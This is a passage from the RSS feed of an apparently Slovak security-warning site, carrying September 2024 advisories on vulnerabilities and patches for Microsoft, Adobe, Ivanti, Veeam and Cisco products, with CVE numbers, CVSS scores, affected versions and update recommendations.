<li>Azure CycleCloud 8.1.0</li>



<li>Azure CycleCloud 8.1.1</li>



<li>Azure CycleCloud 8.2.0</li>



<li>Azure CycleCloud 8.2.1</li>



<li>Azure CycleCloud 8.2.2</li>



<li>Azure CycleCloud 8.3.0</li>



<li>Azure CycleCloud 8.4.0</li>



<li>Azure CycleCloud 8.4.1</li>



<li>Azure CycleCloud 8.4.2</li>



<li>Azure CycleCloud 8.5.0</li>



<li>Azure CycleCloud 8.6.0</li>



<li>Azure CycleCloud 8.6.1</li>



<li>Azure CycleCloud 8.6.2</li>



<li>Azure CycleCloud 8.6.3</li>



<li>Azure Network Watcher VM Extension for Windows</li>



<li>Azure Stack Hub</li>



<li>Azure Web Apps</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft AutoUpdate for Mac</li>



<li>Microsoft Dynamics 365 (on-premises) version 9.1</li>



<li>Microsoft Dynamics 365 Business Central 2023 Release Wave 1</li>



<li>Microsoft Dynamics 365 Business Central 2023 Release Wave 2</li>



<li>Microsoft Dynamics 365 Business Central 2024 Release Wave 1</li>



<li>Microsoft Excel 2016 (32-bit edition)</li>



<li>Microsoft Excel 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC for Mac 2021</li>



<li>Microsoft Office Online Server</li>



<li>Microsoft Office for Android</li>



<li>Microsoft Office for Universal</li>



<li>Microsoft Publisher 2016 (32-bit edition)</li>



<li>Microsoft Publisher 2016 (64-bit edition)</li>



<li>Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 (GDR)</li>



<li>Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 Azure Connect Feature Pack</li>



<li>Microsoft SQL Server 2017 for x64-based Systems (CU 31)</li>



<li>Microsoft SQL Server 2017 for x64-based Systems (GDR)</li>



<li>Microsoft SQL Server 2019 for x64-based Systems (CU 28)</li>



<li>Microsoft SQL Server 2019 for x64-based Systems (GDR)</li>



<li>Microsoft SQL Server 2022 for x64-based Systems (CU 14)</li>



<li>Microsoft SQL Server 2022 for x64-based Systems (GDR)</li>



<li>Microsoft SharePoint Enterprise Server 2016</li>



<li>Microsoft SharePoint Server 2019</li>



<li>Microsoft SharePoint Server Subscription Edition</li>



<li>Microsoft Visio 2016 (32-bit edition)</li>



<li>Microsoft Visio 2016 (64-bit edition)</li>



<li>Outlook for iOS</li>



<li>Power Automate for Desktop</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for ARM64-based Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows 11 version 21H2 for ARM64-based Systems</li>



<li>Windows 11 version 21H2 for x64-based Systems</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<ol style="list-style-type:upper-roman">
<li><strong></strong><strong>Kritické zraniteľnosti:</strong></li>
</ol>



<p><strong>CVE-2024-43491</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť v&nbsp;komponente Windows Update spočíva v&nbsp;použití odalokovaného miesta v&nbsp;pamäti a&nbsp;vzdialený neautentifikovaný útočník by ju prostredncítvom zaslania špeciálne vytvorenej požiadavky mohol zneužiť na vykonanie škodlivého kódu. <strong>Zraniteľnosť je v&nbsp;súčasnosti aktívne zneužívaná útočníkmi.</strong></p>



<p><strong>CVE-2024-38018</strong> (CVSS skóre 8,8), <strong>CVE-2024-43464</strong> (CVSS skóre 7,2)</p>



<p>Zraniteľnosti v&nbsp;produkte Microsoft SharePoint spočívajú v&nbsp; deserializácii nedôveryhodných dát a umožňujú vzdialené vykonanie škodlivého kódu.</p>



<p>Pre úspešné zneužitie CVE-2024-38018 musí útočník disponovať oprávneniami úrovne „Site Member“ a&nbsp;vyššie.</p>



<p>Zraniteľnosť s&nbsp;označením CVE-2024-43464 vyžaduje oprávnenia úrovne „Site Owner“ a&nbsp;vyššie a je možné zneužiť nahraním špeciálne vytvoreného súboru a následným zaslaním špeciálne vytvorenej API požiadavky, ktorá vedie k deserializácii parametrov tohto súboru.</p>



<p><strong>CVE-2024-38119</strong> (CVSS skóre 7,5)</p>



<p>Komponent Windows Network Address Translation obsahuje zraniteľnosť spočívajúcu v&nbsp;použití odalokovaného miesta v&nbsp;pamäti, ktorú možno zneužiť na vykonanie škodlivého kódu. Zneužitie zraniteľnosti vyžaduje, aby sa útočník nachádzal v&nbsp;rovnakom sieťovom segmente.</p>



<p><strong>CVE-2024-38194</strong> (CVSS skóre 8,4)</p>



<p>Zraniteľnosť v Azure Web Apps spočíva v&nbsp;nesprávnom overovaní vstupov a&nbsp;vzdialený autentifikovaný útočník by ju mohol zneužiť na eskaláciu privilégií. Zraniteľnosť bola opravená spoločnosťou Microsoft a&nbsp;nie je potrebná ďalšia aktivita zo strany používateľov.</p>



<p><strong>CVE-2024-38220</strong> (CVSS skóre 9,0), <strong>CVE-2024-38216</strong> (CVSS skóre 8,2)</p>



<p>Zraniteľnosti v Azure Stack Hub (CVE-2024-38220, CVE-2024-38216) spočívajú v&nbsp;nesprávnom overovaní vstupov a&nbsp;vzdialený autentifikovaný útočník by ich mohol zneužiť na eskaláciu privilégií a&nbsp;získanie neoprávneného prístupu k&nbsp;systémovým zdrojom. Zneužitie zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí iniciovať spojenie</p>



<ol style="list-style-type:upper-roman">
<li><strong></strong><strong>Aktívne zneužívané zraniteľnosti:</strong></li>
</ol>



<p>Aktívne zneužívané zraniteľnosti sa nachádzajú v&nbsp;produkte Microsoft Publisher (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38226">CVE-2024-38226</a>), komponentoch Windows Installer (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38014">CVE-2024-38014</a>) a Windows Update (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43491">CVE-2024-43491</a>) a&nbsp;bezpečnostnom mechanizme Mark of the Web (<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38217">CVE-2024-38217</a>). Uvedené zraniteľnosti možno zneužiť na vzdialené vykonanie kódu, eskaláciu privilégií a&nbsp;obídenie bezpečnostných mechanizmov SmartScreen.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Spoofing</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladné nasadenie augustového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete&nbsp;</strong><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Sep">tu</a><strong>.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Sep">https://msrc.microsoft.com/update-guide/releaseNote/2024-Sep</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38018">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38018</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38119">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38119</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38194">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38194</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38216">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38216</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38220">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38220</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43464">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43464</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43491">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43491</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/358704">https://exchange.xforce.ibmcloud.com/vulnerabilities/358704</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38226">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38226</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38014">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38014</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38217">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38217</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1339/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Bezpečnostné zraniteľnosti v produktoch Adobe</title>
		<link>/posts/1336</link>
					<comments>/posts/1336#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Sep 2024 09:24:53 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1336</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty Media Encoder, Audition, After Effects, Premiere Pro, Illustrator, Acrobat Reader, ColdFusion a...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>
<p><strong>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty Media Encoder, Audition, After Effects, Premiere Pro, Illustrator, Acrobat Reader, ColdFusion a Photoshop, ktoré opravujú 29 zraniteľností, z čoho 19 sú označené ako kritické. Najzávažnejšie zraniteľnosti by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeciálne vytvorených súborov mohol zneužiť na vzdialené vykonanie škodlivého kódu. Ostatné zraniteľnosti možno zneužiť na získanie neoprávneného prístupu k citlivým údajom, vykonanie neoprávnených zmien v systéme a zneprístupnenie služby.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Adobe Media Encoder vo verziách starších ako 24.6</li>



<li>Adobe Media Encoder vo verziách starších ako 23.6.9</li>



<li>Adobe Audition vo verziách starších ako 24.6</li>



<li>Adobe Audition vo verziách starších ako 23.6.9</li>



<li>Adobe After Effects vo verziách starších ako 24.6</li>



<li>Adobe After Effects vo verziách starších ako 23.6.9</li>



<li>Adobe Premiere Pro vo verziách starších ako 24.6</li>



<li>Adobe Premiere Pro vo verziách starších ako 23.6.9</li>



<li>Adobe Illustrator 2024 vo verziách starších ako 28.7.1</li>



<li>Adobe Illustrator 2024 vo verziách starších ako 27.9.6</li>



<li>Acrobat DC vo verziách starších ako 24.003.20112</li>



<li>Acrobat Reader DC vo verziách starších ako 24.003.20112</li>



<li>Acrobat 2024 vo verziách starších ako 24.001.30187</li>



<li>Acrobat 2020 vo verziách starších ako 20.005.30680</li>



<li>Acrobat Reader 2020 vo verziách starších ako 20.005.30680</li>



<li>ColdFusion 2023 vo verziách starších ako Update 10</li>



<li>ColdFusion 2021 vo verziách starších ako Update 16</li>



<li>Photoshop 2023 vo verziách starších ako 24.7.5</li>



<li>Photoshop 2024 vo verziách starších ako 25.12</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Adobe ColdFusion</u></strong></p>



<p><strong>CVE-2024-41874 </strong>(CVSS skóre 9,8)</p>



<p>Najzávažnejšia kritická zraniteľnosť spočíva v&nbsp;deserializácii nedôveryhodných dát a&nbsp;možno ju zneužiť na vykonanie škodlivého kódu. <strong>Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.</strong></p>



<p><strong><u>Adobe Media Encoder</u></strong></p>



<p><strong>CVE-2024-39377 </strong>(CVSS skóre 7,8), <strong>CVE-2024-41871 </strong>(CVSS skóre 5,5)</p>



<p>Zraniteľnosti umožňujúce čítanie a&nbsp;zápis mimo povolených hodnôt možno zneužiť na vykonanie škodlivého kódu.</p>



<p><strong><u>Adobe Audition</u></strong></p>



<p><strong>CVE-2024-39378 </strong>(CVSS skóre 7,8)</p>



<p>CVE-2024-39378 možno zneužiť na zápis mimo povolených hodnôt možno zneužiť na vykonanie škodlivého kódu.</p>



<p><strong><u>Adobe After Effects</u></strong></p>



<p><strong>CVE-2024-39380, CVE-2024-39381, CVE-2024-41859 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajúce v&nbsp;zápise mimo povolených hodnôt a&nbsp;pretečení medzipamäte haldy umožňujú vykonanie škodlivého kódu.</p>



<p><strong><u>Adobe Premiere Pro</u></strong></p>



<p><strong>CVE-2024-39384 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosť spočívajúcu v&nbsp;zápise mimo povolených hodnôt možno zneužiť na vykonanie škodlivého kódu.</p>



<p><strong><u>Adobe Premiere Pro</u></strong></p>



<p><strong>CVE-2024-41857, CVE-2024-34121, CVE-2024-41856, CVE-2024-45114, CVE-2024-43758 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajú v&nbsp;nesprávnom overovaní vstupov, zápise mimo povolené hodnoty, použití odalokovaného miesta v&nbsp;pamäti a&nbsp;v&nbsp;pretečení a&nbsp;podtečení celočíselnej premennej a&nbsp;umožňujú vykonanie škodlivého kódu.</p>



<p><strong><u>Adobe Premiere Pro</u></strong></p>



<p><strong>CVE-2024-45112 </strong>(CVSS skóre 8,6)<strong>, CVE-2024-41869 </strong>(CVSS skóre 7,8)</p>



<p>CVE-2024-45112 spočíva v&nbsp;nesprávnom určení dátových typov pri prístupe k&nbsp;zdrojom zariadenia a CVE-2024-41869 v&nbsp;použití odalokovaného miesta v pamäti. Obe zraniteľnosti umožňujú vykonanie kódu.</p>



<p><strong><u>Adobe Photoshop</u></strong></p>



<p><strong>CVE-2024-43756, CVE-2024-43760, CVE-2024-45108, CVE-2024-45109 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajúce v zápise mimo povolených hodnôt a pretečení medzipamäte haldy umožňujú vykonanie škodlivého kódu.</p>



<p><strong>Zneužitie uvedených zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí stiahnuť a&nbsp;otvoriť špeciálne vytvorené súbory.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://helpx.adobe.com/security/products/media-encoder/apsb24-53.html">https://helpx.adobe.com/security/products/media-encoder/apsb24-53.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/audition/apsb24-54.html">https://helpx.adobe.com/security/products/audition/apsb24-54.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/after_effects/apsb24-55.html">https://helpx.adobe.com/security/products/after_effects/apsb24-55.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/premiere_pro/apsb24-58.html">https://helpx.adobe.com/security/products/premiere_pro/apsb24-58.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/illustrator/apsb24-66.html">https://helpx.adobe.com/security/products/illustrator/apsb24-66.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/acrobat/apsb24-70.html">https://helpx.adobe.com/security/products/acrobat/apsb24-70.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/coldfusion/apsb24-71.html">https://helpx.adobe.com/security/products/coldfusion/apsb24-71.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/photoshop/apsb24-72.html">https://helpx.adobe.com/security/products/photoshop/apsb24-72.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1336/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Bezpečnostné zraniteľnosti v produkte Ivanti Endpoint Management</title>
		<link>/posts/1334</link>
					<comments>/posts/1334#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Sep 2024 09:23:05 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1334</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 16 bezpečnostných zraniteľností v&#160;produkte&#160;Endpoint Manager, z&#160;čoho 10 je označených ako kritických. Kritické zraniteľnosti...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 16 bezpečnostných zraniteľností v&nbsp;produkte&nbsp;Endpoint Manager, z&nbsp;čoho 10 je označených ako kritických. Kritické zraniteľnosti možno zneužiť na vykonanie škodlivého kódu a&nbsp;získanie úplnej kontroly nad systémom. Ostatné zraniteľnosti možno zneužiť na eskaláciu privilégií, získanie neoprávneného prístupu k&nbsp;citlivým údajom a&nbsp;vykonanie neoprávnených zmien v&nbsp;systéme.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti Endpoint Manager 2022 vo verziách starších ako 2022 SU6</li>



<li>Ivanti Endpoint Manager 2024 bez bezpečnostných záplat z&nbsp;júla a&nbsp;septembra 2024</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-29847 </strong>(CVSS skóre 10,0)</p>



<p>Najzávažnejšia zraniteľnosť s označením CVE-2024-29847 spočíva v deserializácii nedôveryhodných dát a vzdialený neautentifikovaný útočník by ju prostredníctvom zaslania špeciálne vytvorenej požiadavky mohol zneužiť na vzdialené vykonanie kódu na core serveri.</p>



<p><strong>CVE-2024-32840, CVE-2024-32842, CVE-2024-32843, CVE-2024-32845, CVE-2024-32846, CVE-2024-32848, CVE-2024-34779, CVE-2024-34783, CVE-2024-34785 </strong>(CVSS skóre 9,1)</p>



<p>Bližšie nešpecifikované zraniteľnosti by vzdialený autentifikovaný útočník s&nbsp;oprávneniami administrátora mohol zneužiť na realizáciu SQL injekcie vedúcej k&nbsp;vzdialenému vykonaniu škodlivého kódu.</p>



<p><strong>CVE-2024-37397 </strong>(CVSS skóre 8,2)</p>



<p>XXE (External XML Entity) zraniteľnosť možno zneužiť na získanie neoprávneného prístupu k&nbsp;citlivým údajom z&nbsp;API.</p>



<p><strong>CVE-2024-8191 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosť v&nbsp;manažmentovom rozhraní možno prostredníctvom SQL injekcie zneužiť na vzdialené vykonanie škodlivého kódu. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Výrobca odporúča používať len verzie s&nbsp;platnou technickou podporou a&nbsp;zasiahnuté systémy bezodkladne aktualizovať na najnovšie verzie. Konkrétne verzie produktov a&nbsp;návod na inštláciu aktualizácií môžete nájsť na stránky výrobcu v&nbsp;časti Zdroje.</strong></p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://forums.ivanti.com/s/article/Security-Advisory-EPM-September-2024-for-EPM-2024-and-EPM-2022">https://forums.ivanti.com/s/article/Security-Advisory-EPM-September-2024-for-EPM-2024-and-EPM-2022</a></p>



<p><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/358737">https://exchange.xforce.ibmcloud.com/vulnerabilities/358737</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/ivanti-fixes-maximum-severity-rce-bug-in-endpoint-management-software/">https://www.bleepingcomputer.com/news/security/ivanti-fixes-maximum-severity-rce-bug-in-endpoint-management-software/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1334/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produktoch Veeam</title>
		<link>/posts/1331</link>
					<comments>/posts/1331#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 06 Sep 2024 15:06:03 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Veeam]]></category>
		<guid isPermaLink="false">/?p=1331</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>Spoločnosť Veeam opravila kritické zraniteľnosti v produktoch Backup &#38; Replication (VBR), ONE, Service Provider Console a ďalších. Najzávažnejšia z nich umožňuje neautentifikovanému...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>
<p><strong>Spoločnosť Veeam opravila kritické zraniteľnosti v produktoch Backup &amp; Replication (VBR), ONE, Service Provider Console a ďalších. Najzávažnejšia z nich umožňuje neautentifikovanému útočníkovi vzdialene vykonávať kód vo VBR. V balíku opráv spoločnosť vyriešila aj viacero ďalších vysoko závažných zraniteľností.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Veeam Backup &amp; Replication 12.1.2.172 a staršie verzie 12.x.x.x</li>



<li>Veeam Service Provider Console 8.1.0.19552 a staršie verzie 8.x.x.x</li>



<li>Veeam ONE 12.1.0.3208 a staršie verzie 12.x.x.x</li>



<li><span style="mso-fareast-language:SK"></span>Veeam Agent for Linux 6.1.2.1781 a staršie verzie 6.x.x.x</li>



<li><span style="mso-fareast-language:SK"></span>Veeam Backup for Nutanix AHV Plug-In 12.5.1.8 a staršie verzie 12.x.x.x</li>



<li>Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In 12.4.1.45 a staršie verzie 12.x.x.x</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>Veeam Backup &amp; Replication</strong><br><br>Kritickú zraniteľnosť CVE-2024-40711 (CVSSv3.1 skóre 9,8) môže neautentifikovaný útočník zneužiť na vzdialené vykonávanie kódu.<br><br>Patch opravuje aj ďalšie vysoko závažné zraniteľnosti, ktoré umožňujú vzdialené vykonávanie kódu, získanie prihlasovacích údajov, manipuláciu so zálohami, či obchádzanie MFA.<br><br>Služba VRB je zaujímavým cieľom pre ransomvérové skupiny.<br><br><strong>Service Provider Console</strong><br><br>Kritická zraniteľnosť <strong>CVE-2024-38650</strong> (CVSS skóre 9,9) umožňuje útočníkovi s nízkymi oprávneniami získať NTLM hash k servisnému účtu servera VSPC.<br><br>Kritická zraniteľnosť <strong>CVE-2024-39714</strong> (CVSS skóre 9,9) umožňuje útočníkovi s nízkymi oprávneniami nahrávať súbory na server, a tak vzdialene vykonávať kód.<br><br>Patch opravuje aj ďalšie vysoko závažné zraniteľnosti, ktoré umožňujú vzdialené vykonávanie kódu.<br><br><strong>ONE</strong><br><br>Kritická zraniteľnosť <strong>CVE-2024-42024</strong> (CVSS skóre 9,1) umožňuje vykonávať kód na hostiteľskom systéme. Útočník potrebuje prihlasovacie údaje k účtu ONE Agent.<br><br>Kritická zraniteľnosť <strong>CVE-2024-42019</strong> (CVSS skóre 9,0) dovoľuje získať NTLM hash k účtu Reporter Service, pokiaľ útočník predtým získal potrebné údaje z VBR.<br><br>Patch opravuje aj ďalšie vysoko závažné zraniteľnosti, ktoré umožňujú vzdialené vykonávanie kódu, získanie prihlasovacích údajov a manipuláciu so súbormi.<br><br><strong>Agent for Linux</strong><br><br>Veeam opravila vysoko závažnú zraniteľnosť CVE-2024-40709 umožňujúcu lokálnemu útočníkovi s nízkymi oprávneniami získať oprávnenia používateľa root.<br><br><strong>Veeam Backup for Nutanix AHV</strong> a <strong>Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization</strong><br><br>Veeam opravila vysoko závažnú zraniteľnosť CVE-2024-40718 typu SSRF, umožňujúcu lokálnemu útočníkovi s nízkymi oprávneniami získať vyššie oprávnenia.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Únik citlivých informácií </strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia na</p>



<ul>
<li>Veeam Backup &amp; Replication 12.2.0.334</li>



<li>Veeam Service Provider Console 8.1.2.21377</li>



<li>Veeam ONE 12.2.0.4093</li>



<li>Veeam Agent for Linux 6.2.0.101</li>



<li>Veeam Backup for Nutanix AHV Plug-In 12.6.0.632<span style="mso-fareast-language:SK"></span></li>



<li>Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In 12.5.0.229</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-rce-flaw-in-backup-and-replication-software/">https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-rce-flaw-in-backup-and-replication-software/</a></li>



<li><a href="https://www.veeam.com/kb4649">https://www.veeam.com/kb4649</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1331/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cisco opravuje dve kritické zraniteľnosti v Smart Licensing Utility</title>
		<link>/posts/1329</link>
					<comments>/posts/1329#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 06 Sep 2024 14:58:03 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=1329</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Aplikácia Cisco Smart Licensing Utility obsahuje dve kritické zraniteľnosti, ktoré umožňujú útočníkom získať prihlasovacie údaje pre prístup k API rozhraniu s administrátorskými...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Aplikácia Cisco Smart Licensing Utility obsahuje dve kritické zraniteľnosti, ktoré umožňujú útočníkom získať prihlasovacie údaje pre prístup k API rozhraniu s administrátorskými oprávneniami.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco Smart License Utility 2.0.0, 2.1.0 a 2.2.0</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



